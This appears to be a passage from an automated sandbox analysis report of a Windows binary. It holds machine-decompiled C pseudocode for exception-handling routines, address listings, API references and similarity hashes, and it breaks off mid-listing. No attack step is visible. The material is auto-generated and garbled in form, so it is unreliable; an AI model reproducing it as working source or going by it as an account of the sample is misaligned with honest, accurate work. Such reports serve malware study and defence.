                                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                                        						_t91 = 0;
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                                        								goto L9;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                                        								L20:
                                                                                                                                                                        								_t63 = 0;
                                                                                                                                                                        								L61:
                                                                                                                                                                        								return _t63;
                                                                                                                                                                        							}
                                                                                                                                                                        							L9:
                                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t81 =  *0x4054c8; // 0x0
                                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                        							_t58 = 0;
                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                                        								L18:
                                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                                        									L60:
                                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                                        									goto L61;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                        										L46:
                                                                                                                                                                        										_t63 = 1;
                                                                                                                                                                        										 *0x405510 = 1;
                                                                                                                                                                        										__eflags =  *0x405510;
                                                                                                                                                                        										if( *0x405510 != 0) {
                                                                                                                                                                        											goto L61;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t84 =  *0x4054c8; // 0x0
                                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                                        											L51:
                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                                        												L59:
                                                                                                                                                                        												 *0x405510 = 0;
                                                                                                                                                                        												goto L5;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t94 = 0;
                                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                                        												L57:
                                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                                        													 *0x4054c8 = _t86;
                                                                                                                                                                        												}
                                                                                                                                                                        												goto L59;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												do {
                                                                                                                                                                        													_t68 = 0x4054d0 + _t94 * 4;
                                                                                                                                                                        													_t105 =  *_t68;
                                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                                        													__eflags = _t94;
                                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                                        													_t110 = _t105;
                                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                                        												goto L57;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t69 = 0x4054cc + _t84 * 4;
                                                                                                                                                                        										while(1) {
                                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                                        												goto L51;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                                        												continue;
                                                                                                                                                                        											}
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                                        										goto L46;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                        										goto L46;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                        										goto L20;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								L16:
                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        								if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *0x405510 = 1;
                                                                                                                                                                        							__eflags =  *0x405510;
                                                                                                                                                                        							if( *0x405510 != 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        							if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        								L32:
                                                                                                                                                                        								_t100 = 0;
                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                                        									L34:
                                                                                                                                                                        									 *0x405510 = 0;
                                                                                                                                                                        									goto L5;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									goto L33;
                                                                                                                                                                        								}
                                                                                                                                                                        								do {
                                                                                                                                                                        									L33:
                                                                                                                                                                        									_t90 = 0x4054d0 + _t100 * 4;
                                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t25 = _t81 - 1; // -1
                                                                                                                                                                        							_t58 = _t25;
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                                        								L28:
                                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                                        									 *0x4054c8 = _t81;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                        								_t58 = _t28;
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L25;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								L25:
                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        								if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                        					goto L61;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





































                                                                                                                                                                        0x00403467
                                                                                                                                                                        0x0040346a
                                                                                                                                                                        0x00403470
                                                                                                                                                                        0x0040348e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040348e
                                                                                                                                                                        0x00403478
                                                                                                                                                                        0x00403481
                                                                                                                                                                        0x00403487
                                                                                                                                                                        0x00403496
                                                                                                                                                                        0x00403499
                                                                                                                                                                        0x0040349c
                                                                                                                                                                        0x004034a6
                                                                                                                                                                        0x004034a6
                                                                                                                                                                        0x004034a8
                                                                                                                                                                        0x004034ab
                                                                                                                                                                        0x004034ad
                                                                                                                                                                        0x004034ad
                                                                                                                                                                        0x004034af
                                                                                                                                                                        0x004034b2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034b4
                                                                                                                                                                        0x004034b6
                                                                                                                                                                        0x0040351c
                                                                                                                                                                        0x0040351c
                                                                                                                                                                        0x0040367a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040367a
                                                                                                                                                                        0x004034b8
                                                                                                                                                                        0x004034b8
                                                                                                                                                                        0x004034bc
                                                                                                                                                                        0x004034be
                                                                                                                                                                        0x004034be
                                                                                                                                                                        0x004034be
                                                                                                                                                                        0x004034be
                                                                                                                                                                        0x004034c1
                                                                                                                                                                        0x004034c2
                                                                                                                                                                        0x004034c5
                                                                                                                                                                        0x004034c5
                                                                                                                                                                        0x004034c9
                                                                                                                                                                        0x004034cd
                                                                                                                                                                        0x004034db
                                                                                                                                                                        0x004034db
                                                                                                                                                                        0x004034e3
                                                                                                                                                                        0x004034e9
                                                                                                                                                                        0x004034eb
                                                                                                                                                                        0x004034ed
                                                                                                                                                                        0x004034fd
                                                                                                                                                                        0x0040350a
                                                                                                                                                                        0x0040350e
                                                                                                                                                                        0x00403513
                                                                                                                                                                        0x00403515
                                                                                                                                                                        0x00403593
                                                                                                                                                                        0x00403593
                                                                                                                                                                        0x00403517
                                                                                                                                                                        0x00403517
                                                                                                                                                                        0x00403517
                                                                                                                                                                        0x00403595
                                                                                                                                                                        0x00403597
                                                                                                                                                                        0x00403678
                                                                                                                                                                        0x00403678
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040359d
                                                                                                                                                                        0x0040359d
                                                                                                                                                                        0x004035a4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035aa
                                                                                                                                                                        0x004035ae
                                                                                                                                                                        0x0040360a
                                                                                                                                                                        0x0040360c
                                                                                                                                                                        0x00403614
                                                                                                                                                                        0x00403616
                                                                                                                                                                        0x00403618
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040361a
                                                                                                                                                                        0x00403620
                                                                                                                                                                        0x00403622
                                                                                                                                                                        0x00403624
                                                                                                                                                                        0x00403639
                                                                                                                                                                        0x00403639
                                                                                                                                                                        0x0040363b
                                                                                                                                                                        0x0040366a
                                                                                                                                                                        0x00403671
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403671
                                                                                                                                                                        0x0040363f
                                                                                                                                                                        0x00403640
                                                                                                                                                                        0x00403642
                                                                                                                                                                        0x00403644
                                                                                                                                                                        0x00403644
                                                                                                                                                                        0x00403646
                                                                                                                                                                        0x00403648
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x0040365e
                                                                                                                                                                        0x0040365e
                                                                                                                                                                        0x00403661
                                                                                                                                                                        0x00403663
                                                                                                                                                                        0x00403663
                                                                                                                                                                        0x00403664
                                                                                                                                                                        0x00403664
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040364c
                                                                                                                                                                        0x0040364c
                                                                                                                                                                        0x0040364c
                                                                                                                                                                        0x00403653
                                                                                                                                                                        0x00403655
                                                                                                                                                                        0x00403655
                                                                                                                                                                        0x00403656
                                                                                                                                                                        0x00403658
                                                                                                                                                                        0x0040365a
                                                                                                                                                                        0x0040365a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040364c
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x00403626
                                                                                                                                                                        0x0040362d
                                                                                                                                                                        0x0040362d
                                                                                                                                                                        0x0040362f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403631
                                                                                                                                                                        0x00403632
                                                                                                                                                                        0x00403635
                                                                                                                                                                        0x00403637
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403637
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040362d
                                                                                                                                                                        0x004035b0
                                                                                                                                                                        0x004035b3
                                                                                                                                                                        0x004035b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035c1
                                                                                                                                                                        0x004035c3
                                                                                                                                                                        0x004035c9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035cf
                                                                                                                                                                        0x004035d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035db
                                                                                                                                                                        0x004035dd
                                                                                                                                                                        0x004035e6
                                                                                                                                                                        0x004035ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035f0
                                                                                                                                                                        0x004035f3
                                                                                                                                                                        0x004035f5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004035fc
                                                                                                                                                                        0x004035fe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403600
                                                                                                                                                                        0x00403604
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403604
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034f6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034f8
                                                                                                                                                                        0x004034f9
                                                                                                                                                                        0x004034fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034fb
                                                                                                                                                                        0x00403523
                                                                                                                                                                        0x00403525
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403535
                                                                                                                                                                        0x00403537
                                                                                                                                                                        0x00403539
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040353f
                                                                                                                                                                        0x00403546
                                                                                                                                                                        0x00403572
                                                                                                                                                                        0x00403572
                                                                                                                                                                        0x00403574
                                                                                                                                                                        0x00403576
                                                                                                                                                                        0x0040358a
                                                                                                                                                                        0x0040358c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403581
                                                                                                                                                                        0x00403582
                                                                                                                                                                        0x00403584
                                                                                                                                                                        0x00403586
                                                                                                                                                                        0x00403586
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403548
                                                                                                                                                                        0x00403548
                                                                                                                                                                        0x0040354b
                                                                                                                                                                        0x0040354d
                                                                                                                                                                        0x0040355f
                                                                                                                                                                        0x0040355f
                                                                                                                                                                        0x00403562
                                                                                                                                                                        0x00403564
                                                                                                                                                                        0x00403564
                                                                                                                                                                        0x00403565
                                                                                                                                                                        0x00403565
                                                                                                                                                                        0x0040356b
                                                                                                                                                                        0x0040356b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x00403556
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403558
                                                                                                                                                                        0x00403558
                                                                                                                                                                        0x00403559
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403559
                                                                                                                                                                        0x0040355b
                                                                                                                                                                        0x0040355d
                                                                                                                                                                        0x00403570
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403570
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040355d
                                                                                                                                                                        0x004034cf
                                                                                                                                                                        0x004034d2
                                                                                                                                                                        0x004034d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034d7
                                                                                                                                                                        0x004034d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034d9
                                                                                                                                                                        0x0040349e
                                                                                                                                                                        0x004034a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040350E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                                        • Opcode ID: 0571f70d1273587b70a41593df780ae5aff3d20b4e76bd91cba6a8d9c4e06697
                                                                                                                                                                        • Instruction ID: 9b08cf59018af333a9b19941b965ab4b7ecf4ce60a4218e53194480d37047458
                                                                                                                                                                        • Opcode Fuzzy Hash: 0571f70d1273587b70a41593df780ae5aff3d20b4e76bd91cba6a8d9c4e06697
                                                                                                                                                                        • Instruction Fuzzy Hash: FD51CB30610601BBDB25CF19C99476A3FA9EB8535AF24853BD405E73E0E739DE818A5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040165E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorStatus
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1596131371-0
                                                                                                                                                                        • Opcode ID: 2df2fa3a496b1bf5b10dc844860ef91eec5d12f34f84f5791f6b2514dc0c682b
                                                                                                                                                                        • Instruction ID: c777874dc26cfe07469e196e1318e086f4db5568e11f6b687412d05c914dee13
                                                                                                                                                                        • Opcode Fuzzy Hash: 2df2fa3a496b1bf5b10dc844860ef91eec5d12f34f84f5791f6b2514dc0c682b
                                                                                                                                                                        • Instruction Fuzzy Hash: DFC012716042016BDE189B20DD19E2B7A15EB90340F00482DB249A50B0CA759850DA19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                        			E0040323C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				signed int* _t43;
                                                                                                                                                                        				char _t44;
                                                                                                                                                                        				void* _t46;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				long _t66;
                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                        				signed int* _t82;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        
                                                                                                                                                                        				_t43 = _t84;
                                                                                                                                                                        				_t65 = __ebx + 2;
                                                                                                                                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                        				_t89 = _t95;
                                                                                                                                                                        				_t96 = _t95 - 8;
                                                                                                                                                                        				_push(_t65);
                                                                                                                                                                        				_push(_t84);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				asm("cld");
                                                                                                                                                                        				_t66 = _a8;
                                                                                                                                                                        				_t44 = _a4;
                                                                                                                                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                        					_push(_t89);
                                                                                                                                                                        					E004033A3(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                        					_t46 = 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v12 = _t44;
                                                                                                                                                                        					_v8 = _a12;
                                                                                                                                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                        					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                        					_t80 =  *(_t66 + 8);
                                                                                                                                                                        					_t49 = E0040345D(_t66);
                                                                                                                                                                        					_t99 = _t96 + 4;
                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						while(_t86 != 0xffffffff) {
                                                                                                                                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                        								L8:
                                                                                                                                                                        								_t80 =  *(_t66 + 8);
                                                                                                                                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                        								continue;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t54 =  *_t53();
                                                                                                                                                                        								_t89 = _t89;
                                                                                                                                                                        								_t86 = _t86;
                                                                                                                                                                        								_t66 = _a8;
                                                                                                                                                                        								_t55 = _t54;
                                                                                                                                                                        								_t106 = _t54;
                                                                                                                                                                        								if(_t106 == 0) {
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									if(_t106 < 0) {
                                                                                                                                                                        										_t46 = 0;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t82 =  *(_t66 + 8);
                                                                                                                                                                        										E00403348(_t55, _t66);
                                                                                                                                                                        										_t89 = _t66 + 0x10;
                                                                                                                                                                        										E004033A3(_t89, _t66, 0);
                                                                                                                                                                        										_t99 = _t99 + 0xc;
                                                                                                                                                                        										E0040343F(_t82[2]);
                                                                                                                                                                        										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                        										_t66 = 0;
                                                                                                                                                                        										_t86 = 0;
                                                                                                                                                                        										 *(_t82[2])(1);
                                                                                                                                                                        										goto L8;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_t46 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				L13:
                                                                                                                                                                        				return _t46;
                                                                                                                                                                        			}























                                                                                                                                                                        0x00403240
                                                                                                                                                                        0x00403241
                                                                                                                                                                        0x00403242
                                                                                                                                                                        0x00403245
                                                                                                                                                                        0x00403247
                                                                                                                                                                        0x0040324a
                                                                                                                                                                        0x0040324b
                                                                                                                                                                        0x0040324d
                                                                                                                                                                        0x0040324e
                                                                                                                                                                        0x0040324f
                                                                                                                                                                        0x00403252
                                                                                                                                                                        0x0040325c
                                                                                                                                                                        0x0040330d
                                                                                                                                                                        0x00403314
                                                                                                                                                                        0x0040331d
                                                                                                                                                                        0x00403262
                                                                                                                                                                        0x00403262
                                                                                                                                                                        0x00403268
                                                                                                                                                                        0x0040326e
                                                                                                                                                                        0x00403271
                                                                                                                                                                        0x00403274
                                                                                                                                                                        0x00403278
                                                                                                                                                                        0x0040327d
                                                                                                                                                                        0x00403282
                                                                                                                                                                        0x00403302
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403284
                                                                                                                                                                        0x00403284
                                                                                                                                                                        0x00403290
                                                                                                                                                                        0x00403292
                                                                                                                                                                        0x004032ed
                                                                                                                                                                        0x004032ed
                                                                                                                                                                        0x004032f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403294
                                                                                                                                                                        0x004032a3
